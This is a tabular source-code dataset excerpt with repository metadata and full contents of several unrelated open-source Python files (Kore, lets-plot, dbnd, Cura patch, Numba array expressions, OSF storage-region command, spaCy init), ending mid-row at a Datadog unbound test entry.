blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 4
721
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 5
91
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 321
values | visit_date
timestamp[ns]date 2016-08-12 09:31:09
2023-09-06 10:45:07
| revision_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| committer_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| github_id
int64 426
681M
| star_events_count
int64 101
243k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[ns]date 2012-06-28 18:51:49
2023-09-14 21:59:16
⌀ | gha_created_at
timestamp[ns]date 2008-02-11 22:55:26
2023-08-10 11:14:58
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 26
values | language
stringclasses 2
values | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 6
10.2M
| extension
stringclasses 115
values | filename
stringlengths 3
113
| content
stringlengths 6
10.2M
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2bd509785762d20197fe360b4a3b83a7a260de09
|
35404d163c883a4e73b638b9c01096b67c6cafc7
|
/examples/python-pgsql/app.py
|
d0fb670dd98bff11d9c11ad2a94966df9e8aec51
|
[
"ISC"
] |
permissive
|
jorisvink/kore
|
d7035e599827f1ad906f4281d587b0c319d44d44
|
92e1ffcc10845a78775e02c8fe4486a616cd137d
|
refs/heads/master
| 2023-04-28T21:45:41.821137
| 2023-04-15T08:03:31
| 2023-04-15T08:03:31
| 10,504,702
| 3,777
| 477
|
ISC
| 2023-04-06T05:57:45
| 2013-06-05T14:37:22
|
C
|
UTF-8
|
Python
| false
| false
| 2,024
|
py
|
app.py
|
#
# Copyright (c) 2017-2018 Joris Vink <joris@coders.se>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# Asynchronous postgresql queries with Python.
import json
import kore
class KoreApp:
def configure(self, args):
# Register the path to our database when Kore starts.
kore.dbsetup("db", "host=/tmp dbname=test")
# A handler that returns 200 OK with hello as body.
def hello(self, req):
req.response(200, b'hello\n')
#
# The query handler that fires of the query and returns a coroutine.
#
# Kore will resume this handler when the query returns a result or
# is successful.
#
# The kore.pgsql() method can throw exceptions, most notably a
# GeneratorExit in case the client connection went away before
# the query was able to be completed.
#
# In this example we're not doing any exception handling.
#
async def query(self, req):
result = await kore.dbquery("db", "SELECT * FROM coders")
req.response(200, json.dumps(result).encode("utf-8"))
#
# A slow query that returns after 10 seconds.
#
async def slow(self, req):
result = await kore.dbquery("db", "SELECT * FROM pg_sleep(10)")
req.response(200, json.dumps(result).encode("utf-8"))
# Set the application Kore will run to our class.
koreapp = KoreApp()
|
a1e942fa2c78a0274771a8885f1c0db39ba81d8e
|
d01680fe164d915bb3ffd6b10dea1d7cac503630
|
/python-package/lets_plot/geo_data/gis/geocoding_service.py
|
eea61087320a92c6f06747770bc45d60aae3f029
|
[
"MIT",
"Apache-2.0",
"LGPL-2.0-or-later",
"BSD-3-Clause",
"LGPL-3.0-only"
] |
permissive
|
JetBrains/lets-plot
|
4ba8edd8910967d5e15d8d0ea1a9cd7a9c50432f
|
af4f6554eb9cc250259a6a6757b5c8d920dde8c4
|
refs/heads/master
| 2023-09-01T04:15:04.414149
| 2023-08-31T16:48:57
| 2023-08-31T16:48:57
| 176,771,727
| 1,264
| 59
|
MIT
| 2023-09-07T12:42:01
| 2019-03-20T16:13:03
|
Kotlin
|
UTF-8
|
Python
| false
| false
| 1,652
|
py
|
geocoding_service.py
|
import gzip
import json
import urllib.parse
import urllib.request
from urllib.error import HTTPError
from .json_request import RequestFormatter
from .json_response import ResponseParser
from .request import Request
from .response import Response
from lets_plot._global_settings import has_global_value, get_global_str, GEOCODING_ROUTE
from lets_plot.settings_utils import GEOCODING_PROVIDER_URL
class GeocodingService:
def do_request(self, request: Request) -> Response:
if not has_global_value(GEOCODING_PROVIDER_URL):
raise ValueError('Geocoding server url is not defined')
try:
request_json = RequestFormatter().format(request).to_dict()
request_str = json.dumps(request_json)
request = urllib.request.Request(
url=get_global_str(GEOCODING_PROVIDER_URL) + GEOCODING_ROUTE,
headers={'Content-Type': 'application/json', 'Accept-Encoding': 'gzip'},
method='POST',
data=bytearray(request_str, 'utf-8')
)
response = urllib.request.urlopen(request)
if response.info().get('Content-Encoding') == 'gzip':
content = response.read()
response_str = gzip.decompress(content).decode('utf-8')
else:
response_str = response.read().decode('utf-8')
response_json = json.loads(response_str)
return ResponseParser().parse(response_json)
except HTTPError as e:
raise ValueError(
'Geocoding server connection failure: {} {} ({})'.format(e.code, e.msg, e.filename)) from None
|
bc13384d374452cedc3064c908fbad60c16b8e7a
|
b7163b44b679e082fe97cf7fcd0c73b2fcdb38eb
|
/modules/dbnd/src/dbnd/_core/parameter/value_types/task_value.py
|
60949d4f7f591e9b83c44c821d6c688de9068ad8
|
[
"Apache-2.0"
] |
permissive
|
databand-ai/dbnd
|
70c95d95e12bfb8ab471a6dce27691ed658cb92d
|
d59c99dcdcd280d7eec36a693dd80f8c8c831ea2
|
refs/heads/develop
| 2023-06-24T18:07:56.524526
| 2023-05-28T07:57:36
| 2023-05-28T07:57:36
| 231,361,064
| 257
| 33
|
Apache-2.0
| 2023-08-06T08:30:28
| 2020-01-02T10:42:47
|
Python
|
UTF-8
|
Python
| false
| false
| 2,488
|
py
|
task_value.py
|
# © Copyright Databand.ai, an IBM Company 2022
from dbnd._core.constants import _TaskParamContainer
from dbnd._core.current import get_settings
from dbnd._core.task import Config
from dbnd._core.task_build.task_registry import (
build_task_from_config,
get_task_registry,
)
from targets.values import ValueType
class TaskValueType(ValueType):
"""
A value that takes another databand task class.
When used programatically, the parameter should be specified
directly with the :py:class:`dbnd.tasks.Task` (sub) class. Like
``MyMetaTask(my_task_param=my_tasks.MyTask)``. On the command line,
you specify the :py:meth:`dbnd.tasks.Task.get_task_family`. Like
.. code-block:: console
$ dbnd --module my_tasks MyMetaTask --my_task_param my_namespace.MyTask
Where ``my_namespace.MyTask`` is defined in the ``my_tasks`` python module.
When the :py:class:`dbnd.tasks.Task` class is instantiated to an object.
The value will always be a task class (and not a string).
"""
type = _TaskParamContainer
def parse_from_str(self, input):
"""
Parse a task_famly using the :class:`~dbnd._core.register.Register`
"""
task_cls = get_task_registry().get_task_cls(input)
return task_cls()
def to_str(self, cls):
"""
Converts the :py:class:`dbnd.tasks.Task` (sub) class to its family name.
"""
return cls.get_task_family()
def is_type_of(self, value):
return isinstance(value, _TaskParamContainer)
class ConfigValueType(ValueType):
type = Config
support_from_str = True
def __init__(self, config_cls):
self.config_cls = config_cls
def parse_from_str(self, input):
"""
Parse a task_famly using the :class:`~dbnd._core.register.Register`
"""
from dbnd._core.settings.env import EnvConfig
if isinstance(self.config_cls, EnvConfig):
return get_settings().get_env_config(input)
return build_task_from_config(input, expected_type=self.config_cls)
def to_str(self, x):
"""
Converts the :py:class:`dbnd.tasks.Task` (sub) class to its family name.
"""
if x:
return x.task_name
return super(ConfigValueType, self).to_str(x)
def is_type_of(self, value):
return isinstance(value, Config)
def to_repr(self, x):
if x:
return '"%s"' % x.task_name
return "None"
|
f80c7b4b8777f54c7fe75b2a16df3b95815c09cb
|
e65a4dbfbfb0e54e59787ba7741efee12f7687f3
|
/cad/cura/files/patch-cura__app.py
|
519db77135670a1d8940ee2d6e09473c6ba7fabd
|
[
"BSD-2-Clause"
] |
permissive
|
freebsd/freebsd-ports
|
86f2e89d43913412c4f6b2be3e255bc0945eac12
|
605a2983f245ac63f5420e023e7dce56898ad801
|
refs/heads/main
| 2023-08-30T21:46:28.720924
| 2023-08-30T19:33:44
| 2023-08-30T19:33:44
| 1,803,961
| 916
| 918
|
NOASSERTION
| 2023-09-08T04:06:26
| 2011-05-26T11:15:35
| null |
UTF-8
|
Python
| false
| false
| 234
|
py
|
patch-cura__app.py
|
--- cura_app.py.orig 2020-02-28 16:06:57 UTC
+++ cura_app.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python3.8
+#!/usr/bin/env %%PYTHON_CMD%%
# Copyright (c) 2022 Ultimaker B.V.
# Cura is released under the terms of the LGPLv3 or higher.
|
145cca8dd98cd60f14c9b31ae66ef0ce60d44710
|
29f18e8ddde0379cef7fa00b1a50058be3cafa79
|
/numba/np/ufunc/array_exprs.py
|
458c06e636d1efe245f0396650113aaf11d055d2
|
[
"LicenseRef-scancode-secret-labs-2011",
"BSD-3-Clause",
"LicenseRef-scancode-python-cwi",
"LicenseRef-scancode-free-unknown",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Python-2.0",
"BSD-2-Clause"
] |
permissive
|
numba/numba
|
9a8345ff5f7d57f0ffec40e39941ebf2684df0d1
|
46059957ad416e68476d1e5f32ccd59f7d5df2bb
|
refs/heads/main
| 2023-08-09T22:29:38.170300
| 2023-08-07T15:00:27
| 2023-08-07T15:00:27
| 3,659,275
| 8,247
| 1,151
|
BSD-2-Clause
| 2023-09-13T14:43:48
| 2012-03-08T11:12:43
|
Python
|
UTF-8
|
Python
| false
| false
| 16,873
|
py
|
array_exprs.py
|
import ast
from collections import defaultdict, OrderedDict
import contextlib
import sys
from types import SimpleNamespace
import numpy as np
import operator
from numba.core import types, targetconfig, ir, rewrites, compiler
from numba.core.typing import npydecl
from numba.np.ufunc.dufunc import DUFunc
def _is_ufunc(func):
return isinstance(func, (np.ufunc, DUFunc))
@rewrites.register_rewrite('after-inference')
class RewriteArrayExprs(rewrites.Rewrite):
'''The RewriteArrayExprs class is responsible for finding array
expressions in Numba intermediate representation code, and
rewriting those expressions to a single operation that will expand
into something similar to a ufunc call.
'''
def __init__(self, state, *args, **kws):
super(RewriteArrayExprs, self).__init__(state, *args, **kws)
# Install a lowering hook if we are using this rewrite.
special_ops = state.targetctx.special_ops
if 'arrayexpr' not in special_ops:
special_ops['arrayexpr'] = _lower_array_expr
def match(self, func_ir, block, typemap, calltypes):
"""
Using typing and a basic block, search the basic block for array
expressions.
Return True when one or more matches were found, False otherwise.
"""
# We can trivially reject everything if there are no
# calls in the type results.
if len(calltypes) == 0:
return False
self.crnt_block = block
self.typemap = typemap
# { variable name: IR assignment (of a function call or operator) }
self.array_assigns = OrderedDict()
# { variable name: IR assignment (of a constant) }
self.const_assigns = {}
assignments = block.find_insts(ir.Assign)
for instr in assignments:
target_name = instr.target.name
expr = instr.value
# Does it assign an expression to an array variable?
if (isinstance(expr, ir.Expr) and
isinstance(typemap.get(target_name, None), types.Array)):
self._match_array_expr(instr, expr, target_name)
elif isinstance(expr, ir.Const):
# Track constants since we might need them for an
# array expression.
self.const_assigns[target_name] = expr
return len(self.array_assigns) > 0
def _match_array_expr(self, instr, expr, target_name):
"""
Find whether the given assignment (*instr*) of an expression (*expr*)
to variable *target_name* is an array expression.
"""
# We've matched a subexpression assignment to an
# array variable. Now see if the expression is an
# array expression.
expr_op = expr.op
array_assigns = self.array_assigns
if ((expr_op in ('unary', 'binop')) and (
expr.fn in npydecl.supported_array_operators)):
# It is an array operator that maps to a ufunc.
# check that all args have internal types
if all(self.typemap[var.name].is_internal
for var in expr.list_vars()):
array_assigns[target_name] = instr
elif ((expr_op == 'call') and (expr.func.name in self.typemap)):
# It could be a match for a known ufunc call.
func_type = self.typemap[expr.func.name]
if isinstance(func_type, types.Function):
func_key = func_type.typing_key
if _is_ufunc(func_key):
# If so, check whether an explicit output is passed.
if not self._has_explicit_output(expr, func_key):
# If not, match it as a (sub)expression.
array_assigns[target_name] = instr
def _has_explicit_output(self, expr, func):
"""
Return whether the *expr* call to *func* (a ufunc) features an
explicit output argument.
"""
nargs = len(expr.args) + len(expr.kws)
if expr.vararg is not None:
# XXX *args unsupported here, assume there may be an explicit
# output
return True
return nargs > func.nin
def _get_array_operator(self, ir_expr):
ir_op = ir_expr.op
if ir_op in ('unary', 'binop'):
return ir_expr.fn
elif ir_op == 'call':
return self.typemap[ir_expr.func.name].typing_key
raise NotImplementedError(
"Don't know how to find the operator for '{0}' expressions.".format(
ir_op))
def _get_operands(self, ir_expr):
'''Given a Numba IR expression, return the operands to the expression
in order they appear in the expression.
'''
ir_op = ir_expr.op
if ir_op == 'binop':
return ir_expr.lhs, ir_expr.rhs
elif ir_op == 'unary':
return ir_expr.list_vars()
elif ir_op == 'call':
return ir_expr.args
raise NotImplementedError(
"Don't know how to find the operands for '{0}' expressions.".format(
ir_op))
def _translate_expr(self, ir_expr):
'''Translate the given expression from Numba IR to an array expression
tree.
'''
ir_op = ir_expr.op
if ir_op == 'arrayexpr':
return ir_expr.expr
operands_or_args = [self.const_assigns.get(op_var.name, op_var)
for op_var in self._get_operands(ir_expr)]
return self._get_array_operator(ir_expr), operands_or_args
def _handle_matches(self):
'''Iterate over the matches, trying to find which instructions should
be rewritten, deleted, or moved.
'''
replace_map = {}
dead_vars = set()
used_vars = defaultdict(int)
for instr in self.array_assigns.values():
expr = instr.value
arr_inps = []
arr_expr = self._get_array_operator(expr), arr_inps
new_expr = ir.Expr(op='arrayexpr',
loc=expr.loc,
expr=arr_expr,
ty=self.typemap[instr.target.name])
new_instr = ir.Assign(new_expr, instr.target, instr.loc)
replace_map[instr] = new_instr
self.array_assigns[instr.target.name] = new_instr
for operand in self._get_operands(expr):
operand_name = operand.name
if operand.is_temp and operand_name in self.array_assigns:
child_assign = self.array_assigns[operand_name]
child_expr = child_assign.value
child_operands = child_expr.list_vars()
for operand in child_operands:
used_vars[operand.name] += 1
arr_inps.append(self._translate_expr(child_expr))
if child_assign.target.is_temp:
dead_vars.add(child_assign.target.name)
replace_map[child_assign] = None
elif operand_name in self.const_assigns:
arr_inps.append(self.const_assigns[operand_name])
else:
used_vars[operand.name] += 1
arr_inps.append(operand)
return replace_map, dead_vars, used_vars
def _get_final_replacement(self, replacement_map, instr):
'''Find the final replacement instruction for a given initial
instruction by chasing instructions in a map from instructions
to replacement instructions.
'''
replacement = replacement_map[instr]
while replacement in replacement_map:
replacement = replacement_map[replacement]
return replacement
def apply(self):
'''When we've found array expressions in a basic block, rewrite that
block, returning a new, transformed block.
'''
# Part 1: Figure out what instructions should be rewritten
# based on the matches found.
replace_map, dead_vars, used_vars = self._handle_matches()
# Part 2: Using the information above, rewrite the target
# basic block.
result = self.crnt_block.copy()
result.clear()
delete_map = {}
for instr in self.crnt_block.body:
if isinstance(instr, ir.Assign):
if instr in replace_map:
replacement = self._get_final_replacement(
replace_map, instr)
if replacement:
result.append(replacement)
for var in replacement.value.list_vars():
var_name = var.name
if var_name in delete_map:
result.append(delete_map.pop(var_name))
if used_vars[var_name] > 0:
used_vars[var_name] -= 1
else:
result.append(instr)
elif isinstance(instr, ir.Del):
instr_value = instr.value
if used_vars[instr_value] > 0:
used_vars[instr_value] -= 1
delete_map[instr_value] = instr
elif instr_value not in dead_vars:
result.append(instr)
else:
result.append(instr)
if delete_map:
for instr in delete_map.values():
result.insert_before_terminator(instr)
return result
_unaryops = {
operator.pos: ast.UAdd,
operator.neg: ast.USub,
operator.invert: ast.Invert,
}
_binops = {
operator.add: ast.Add,
operator.sub: ast.Sub,
operator.mul: ast.Mult,
operator.truediv: ast.Div,
operator.mod: ast.Mod,
operator.or_: ast.BitOr,
operator.rshift: ast.RShift,
operator.xor: ast.BitXor,
operator.lshift: ast.LShift,
operator.and_: ast.BitAnd,
operator.pow: ast.Pow,
operator.floordiv: ast.FloorDiv,
}
_cmpops = {
operator.eq: ast.Eq,
operator.ne: ast.NotEq,
operator.lt: ast.Lt,
operator.le: ast.LtE,
operator.gt: ast.Gt,
operator.ge: ast.GtE,
}
def _arr_expr_to_ast(expr):
'''Build a Python expression AST from an array expression built by
RewriteArrayExprs.
'''
if isinstance(expr, tuple):
op, arr_expr_args = expr
ast_args = []
env = {}
for arg in arr_expr_args:
ast_arg, child_env = _arr_expr_to_ast(arg)
ast_args.append(ast_arg)
env.update(child_env)
if op in npydecl.supported_array_operators:
if len(ast_args) == 2:
if op in _binops:
return ast.BinOp(
ast_args[0], _binops[op](), ast_args[1]), env
if op in _cmpops:
return ast.Compare(
ast_args[0], [_cmpops[op]()], [ast_args[1]]), env
else:
assert op in _unaryops
return ast.UnaryOp(_unaryops[op](), ast_args[0]), env
elif _is_ufunc(op):
fn_name = "__ufunc_or_dufunc_{0}".format(
hex(hash(op)).replace("-", "_"))
fn_ast_name = ast.Name(fn_name, ast.Load())
env[fn_name] = op # Stash the ufunc or DUFunc in the environment
ast_call = ast.Call(fn_ast_name, ast_args, [])
return ast_call, env
elif isinstance(expr, ir.Var):
return ast.Name(expr.name, ast.Load(),
lineno=expr.loc.line,
col_offset=expr.loc.col if expr.loc.col else 0), {}
elif isinstance(expr, ir.Const):
return ast.Num(expr.value), {}
raise NotImplementedError(
"Don't know how to translate array expression '%r'" % (expr,))
@contextlib.contextmanager
def _legalize_parameter_names(var_list):
"""
Legalize names in the variable list for use as a Python function's
parameter names.
"""
var_map = OrderedDict()
for var in var_list:
old_name = var.name
new_name = var.scope.redefine(old_name, loc=var.loc).name
new_name = new_name.replace("$", "_").replace(".", "_")
# Caller should ensure the names are unique
if new_name in var_map:
raise AssertionError(f"{new_name!r} not unique")
var_map[new_name] = var, old_name
var.name = new_name
param_names = list(var_map)
try:
yield param_names
finally:
# Make sure the old names are restored, to avoid confusing
# other parts of Numba (see issue #1466)
for var, old_name in var_map.values():
var.name = old_name
class _EraseInvalidLineRanges(ast.NodeTransformer):
def generic_visit(self, node: ast.AST) -> ast.AST:
node = super().generic_visit(node)
if hasattr(node, "lineno"):
if getattr(node, "end_lineno", None) is not None:
if node.lineno > node.end_lineno:
del node.lineno
del node.end_lineno
return node
def _fix_invalid_lineno_ranges(astree: ast.AST):
"""Inplace fixes invalid lineno ranges.
"""
# Make sure lineno and end_lineno are present
ast.fix_missing_locations(astree)
# Delete invalid lineno ranges
_EraseInvalidLineRanges().visit(astree)
# Make sure lineno and end_lineno are present
ast.fix_missing_locations(astree)
def _lower_array_expr(lowerer, expr):
'''Lower an array expression built by RewriteArrayExprs.
'''
expr_name = "__numba_array_expr_%s" % (hex(hash(expr)).replace("-", "_"))
expr_filename = expr.loc.filename
expr_var_list = expr.list_vars()
# The expression may use a given variable several times, but we
# should only create one parameter for it.
expr_var_unique = sorted(set(expr_var_list), key=lambda var: var.name)
# Arguments are the names external to the new closure
expr_args = [var.name for var in expr_var_unique]
# 1. Create an AST tree from the array expression.
with _legalize_parameter_names(expr_var_unique) as expr_params:
ast_args = [ast.arg(param_name, None)
for param_name in expr_params]
# Parse a stub function to ensure the AST is populated with
# reasonable defaults for the Python version.
ast_module = ast.parse('def {0}(): return'.format(expr_name),
expr_filename, 'exec')
assert hasattr(ast_module, 'body') and len(ast_module.body) == 1
ast_fn = ast_module.body[0]
ast_fn.args.args = ast_args
ast_fn.body[0].value, namespace = _arr_expr_to_ast(expr.expr)
_fix_invalid_lineno_ranges(ast_module)
# 2. Compile the AST module and extract the Python function.
code_obj = compile(ast_module, expr_filename, 'exec')
exec(code_obj, namespace)
impl = namespace[expr_name]
# 3. Now compile a ufunc using the Python function as kernel.
context = lowerer.context
builder = lowerer.builder
outer_sig = expr.ty(*(lowerer.typeof(name) for name in expr_args))
inner_sig_args = []
for argty in outer_sig.args:
if isinstance(argty, types.Optional):
argty = argty.type
if isinstance(argty, types.Array):
inner_sig_args.append(argty.dtype)
else:
inner_sig_args.append(argty)
inner_sig = outer_sig.return_type.dtype(*inner_sig_args)
flags = targetconfig.ConfigStack().top_or_none()
flags = compiler.Flags() if flags is None else flags.copy() # make sure it's a clone or a fresh instance
# Follow the Numpy error model. Note this also allows e.g. vectorizing
# division (issue #1223).
flags.error_model = 'numpy'
cres = context.compile_subroutine(builder, impl, inner_sig, flags=flags,
caching=False)
# Create kernel subclass calling our native function
from numba.np import npyimpl
class ExprKernel(npyimpl._Kernel):
def generate(self, *args):
arg_zip = zip(args, self.outer_sig.args, inner_sig.args)
cast_args = [self.cast(val, inty, outty)
for val, inty, outty in arg_zip]
result = self.context.call_internal(
builder, cres.fndesc, inner_sig, cast_args)
return self.cast(result, inner_sig.return_type,
self.outer_sig.return_type)
# create a fake ufunc object which is enough to trick numpy_ufunc_kernel
ufunc = SimpleNamespace(nin=len(expr_args), nout=1, __name__=expr_name)
ufunc.nargs = ufunc.nin + ufunc.nout
args = [lowerer.loadvar(name) for name in expr_args]
return npyimpl.numpy_ufunc_kernel(
context, builder, outer_sig, args, ufunc, ExprKernel)
|
5d507788cb310a6c07ab23ba726000b5b74d0ba0
|
1cb67c06be9a6a0991629a332ca1271f46a1b7dd
|
/build_support/build_defs/zip_plugin_files.py
|
23866045a25456492a8a2a5023d128953549472c
|
[
"Apache-2.0"
] |
permissive
|
jvolkman/intellij-protobuf-editor
|
4517d4c86dbb6c5f71f2e77592297700cad92241
|
6feb43d3b7d84d2743d108d9026f756bd90cb928
|
refs/heads/master
| 2021-06-24T01:22:42.892474
| 2021-06-02T16:03:56
| 2021-06-02T16:03:56
| 223,668,220
| 146
| 15
|
Apache-2.0
| 2021-04-12T17:24:45
| 2019-11-23T23:43:16
|
Java
|
UTF-8
|
Python
| false
| false
| 1,956
|
py
|
zip_plugin_files.py
|
#!/usr/bin/python
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Packages plugin files into a zip archive."""
import argparse
import os
import stat
import zipfile
# Keep this script executable from python2 in the host configuration.
# Python2's open() does not have the "encoding" parameter.
from io import open # pylint: disable=redefined-builtin,g-bad-import-order,g-importing-member
try:
from itertools import izip # pylint: disable=g-importing-member,g-import-not-at-top
except ImportError:
# Python 3.x already has a built-in `zip` that takes `izip`'s place.
izip = zip
parser = argparse.ArgumentParser()
parser.add_argument("--output", help="The output filename.", required=True)
parser.add_argument(
"files_to_zip", nargs="+", help="Sequence of exec_path, zip_path... pairs"
)
def pairwise(t):
it = iter(t)
return izip(it, it)
def main():
args = parser.parse_args()
with zipfile.ZipFile(args.output, "w") as outfile:
for exec_path, zip_path in pairwise(args.files_to_zip):
with open(exec_path, mode="rb") as input_file:
zipinfo = zipfile.ZipInfo(zip_path, (2000, 1, 1, 0, 0, 0))
filemode = stat.S_IMODE(os.fstat(input_file.fileno()).st_mode)
zipinfo.external_attr = filemode << 16
outfile.writestr(zipinfo, input_file.read(), zipfile.ZIP_DEFLATED)
if __name__ == "__main__":
main()
|
7ff2f49233bc9a2716f4d795d134e13c8693b98c
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/testData/quickFixes/PyMakeFunctionReturnTypeQuickFixTest/lambda_after.py
|
9fcb5446e72ab271ab892cc5d01f7b0d6741b4f6
|
[
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 101
|
py
|
lambda_after.py
|
from typing import Callable, Any
def func() -> Callable[[Any], int]:
return lambda x: 42<caret>
|
f4ac25e36d88644e3a920f6b0a0ee6b4a7fc1d60
|
3c41443364da8b44c74dce08ef94a1acd1b66b3e
|
/osf/management/commands/set_institution_storage_regions.py
|
ae5c7ac60d4c11e0d4cb2c826acfd310d58a70bd
|
[
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-warranty-disclaimer",
"AGPL-3.0-only",
"LGPL-2.0-or-later",
"LicenseRef-scancode-proprietary-license",
"MPL-1.1",
"CPAL-1.0",
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause",
"Apache-2.0"
] |
permissive
|
CenterForOpenScience/osf.io
|
71d9540be7989f7118a33e15bc4a6ce2d2492ac1
|
a3e0a0b9ddda5dd75fc8248d58f3bcdeece0323e
|
refs/heads/develop
| 2023-09-04T03:21:14.970917
| 2023-08-31T14:49:20
| 2023-08-31T14:49:20
| 10,199,599
| 683
| 390
|
Apache-2.0
| 2023-09-14T17:07:52
| 2013-05-21T15:53:37
|
Python
|
UTF-8
|
Python
| false
| false
| 4,375
|
py
|
set_institution_storage_regions.py
|
import logging
from django.core.management.base import BaseCommand
from django.db import transaction
from osf.models import Institution, InstitutionStorageRegion
from addons.osfstorage.models import Region
logger = logging.getLogger(__name__)
class Command(BaseCommand):
"""Set storage regions for institutions.
"""
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'-d',
'--dry',
action='store_true',
dest='dry_run',
help='If true, check institution and region only'
)
parser.add_argument(
'-i',
'--institution',
type=str,
required=True,
help='Select the institution to add the storage region to'
)
parser.add_argument(
'-r',
'--region',
type=str,
required=True,
help='Select the storage region to be added to the institution'
)
parser.add_argument(
'-p',
'--preferred',
action='store_true',
dest='is_preferred',
help='Set the storage region as the preferred choice for the institution'
)
def handle(self, *args, **options):
dry_run = options.get('dry_run', False)
if dry_run:
logger.warning('Dry Run: This is a dry-run pass!')
institution_id = options['institution']
region_id = options['region']
is_preferred = options.get('is_preferred', False)
with transaction.atomic():
set_institution_storage_regions(institution_id, region_id, is_preferred=is_preferred)
if dry_run:
raise RuntimeError('Dry run -- transaction rolled back')
def set_institution_storage_regions(institution_id, region_id, is_preferred=False):
# Verify institution and region
try:
institution = Institution.objects.get(_id=institution_id)
region = Region.objects.get(_id=region_id)
except (Institution.DoesNotExist, Region.DoesNotExist) as e:
logger.error(f'Institution and/or Region not found: error={e}')
return
# Get or set region for institution
if region in institution.storage_regions.all():
logger.warning(f'Region [{region._id}] already set for Institution [{institution._id}]')
institution_storage_region = InstitutionStorageRegion.objects.get(
institution=institution,
storage_region=region
)
if institution_storage_region.is_preferred:
logger.warning(f'Region [{region._id}] already set as preferred for Institution [{institution._id}]')
return
else:
institution_storage_region = InstitutionStorageRegion.objects.create(
institution=institution,
storage_region=region
)
logger.info(f'Region [{region._id}] has been added to Institution [{institution._id}]')
# Make sure there is only one preferred region
try:
existing_preferred_institution_storage_region = InstitutionStorageRegion.objects.get(
institution=institution,
is_preferred=True,
)
# Case 1: always set the region as preferred if there is no preferred region for the institution;
# this executes even if the option `-p` / `--preferred` is not provided
except InstitutionStorageRegion.DoesNotExist:
institution_storage_region.is_preferred = True
institution_storage_region.save()
logger.info(f'Region [{region._id}] has been set as preferred choice for Institution [{institution._id}]')
return
# Case 2: do nothing and return if preferred region exists and if `is_preferred` is not set
if not is_preferred:
return
# Case 3: if `is_preferred` is set, clear the existing preferred region before setting the new one
existing_preferred_institution_storage_region.is_preferred = False
existing_preferred_institution_storage_region.save()
logger.info(f'The old preferred region has been removed from Institution [{institution._id}]')
institution_storage_region.is_preferred = True
institution_storage_region.save()
logger.info(f'Region [{region._id}] has been set as the preferred choice for Institution [{institution._id}]')
|
5770908757d93caa0d790965356943b644053e69
|
fbbe424559f64e9a94116a07eaaa555a01b0a7bb
|
/Spacy/source2.7/spacy/__init__.py
|
bda109086db1d12e39bcc9949897dd54d1f361f4
|
[
"MIT"
] |
permissive
|
ryfeus/lambda-packs
|
6544adb4dec19b8e71d75c24d8ed789b785b0369
|
cabf6e4f1970dc14302f87414f170de19944bac2
|
refs/heads/master
| 2022-12-07T16:18:52.475504
| 2022-11-29T13:35:35
| 2022-11-29T13:35:35
| 71,386,735
| 1,283
| 263
|
MIT
| 2022-11-26T05:02:14
| 2016-10-19T18:22:39
|
Python
|
UTF-8
|
Python
| false
| false
| 630
|
py
|
__init__.py
|
# coding: utf8
from __future__ import unicode_literals
from .cli.info import info as cli_info
from .glossary import explain
from .about import __version__
from .errors import Warnings, deprecation_warning
from . import util
def load(name, **overrides):
depr_path = overrides.get('path')
if depr_path not in (True, False, None):
deprecation_warning(Warnings.W001.format(path=depr_path))
return util.load_model(name, **overrides)
def blank(name, **kwargs):
LangClass = util.get_lang_class(name)
return LangClass(**kwargs)
def info(model=None, markdown=False):
return cli_info(model, markdown)
|
e0c6fc2119cb835291bcc8e61ad7ad67770f1198
|
97e557d328b89adbd1459f8988a12ec3a9f4adc7
|
/unbound/tests/test_unbound.py
|
330b06cd8818e250a7723c42b1f9eec7e04f5587
|
[] |
permissive
|
DataDog/integrations-extras
|
1b9c9928af4e5a146b9611aed29db206f420710c
|
1d20f8d945ef802fa6e01b41b6ba99148ac508a4
|
